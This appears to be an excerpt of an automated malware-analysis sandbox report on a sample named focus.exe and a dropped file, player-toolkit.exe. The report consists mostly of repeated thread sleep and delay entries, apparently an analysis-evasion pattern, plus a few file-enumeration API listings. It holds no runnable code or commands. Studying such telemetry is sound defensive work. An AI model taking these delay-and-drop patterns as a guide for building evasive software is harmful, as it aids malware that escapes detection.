Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59010s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58900s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58792s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58683s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58573s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58464s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58353s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58245s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58136s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58026s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57917s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57807s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57698s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57588s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57479s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57370s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57261s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57151s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57042s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56933s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56823s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56713s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56604s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56495s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56386s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56276s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56167s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56057s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55948s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55839s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55729s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55620s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55511s >= -30000s
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55401s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_004027A1 FindFirstFileA,
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E56CD40 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,FindFirstFileW,FindNextFileW,WideCharToMultiByte,
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5490FC FindFirstFileExW,

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59890
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59781
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59673
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59563
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59454
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59345
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59126
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59017
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58907
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58798
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58689
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58579
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58470
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58360
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58251
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58142
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58032
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57923
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57814
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57704
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57595
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57485
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57376
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57266
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57157
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57048
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56939
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56829
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56720
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56610
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56501
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56392
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56282
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56173
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56064
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55954
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55845
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55736
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55626
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55517
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55408
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55298
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55189
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55079
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54970
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54860
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54751
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54642
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54532
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54423
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54313
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54204
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54095
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53985
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53876
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53767
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53657
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53548
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53439
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53329
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53220
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53110
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53001
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52892
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52782
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52673
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52563
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52454
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52345
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52235
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52126
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52016
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51907
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51798
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51689
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51579
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51470
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51360
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51251
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51142
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51037
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50922
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50814
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50704
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50595
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50485
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50376
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50267
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50157
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 50037
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49923
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49813
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49704
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49595
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49485
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49376
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49267
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49157
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 49048
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48939
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48829
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48720
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48610
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48501
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48391
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48282
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48173
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 48063
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47954
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47845
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47735
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47626
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47511
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47356
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47251
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47141
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 47032
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46922
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46813
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46367
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46251
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46140
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 46033
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45899
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 45798
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44630
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44517
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44407
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44298
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44189
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 44079
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43970
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43861
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43750
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43641
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43533
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43423
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43314
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43204
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 43094
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42985
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42876
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42767
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42658
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42548
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42439
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42329
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42220
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42111
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 42001
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41892
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41782
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41673
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41564
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41454
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41345
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41126
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 41017
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40908
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40798
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40689
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40579
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40470
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40361
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40251
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40142
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 40033
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39923
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39814
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39705
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39595
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39486
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39376
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39267
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39157
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 39048
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38939
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38829
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38720
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38611
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38498
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38392
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38283
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38173
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 38064
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37954
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37845
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37736
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37626
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37517
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37407
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37298
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37189
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 37079
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36970
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36861
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36750
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36640
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36530
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36423
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36314
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36204
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 36095
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35986
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35876
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35767
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35657
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35548
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35439
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35329
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 35220
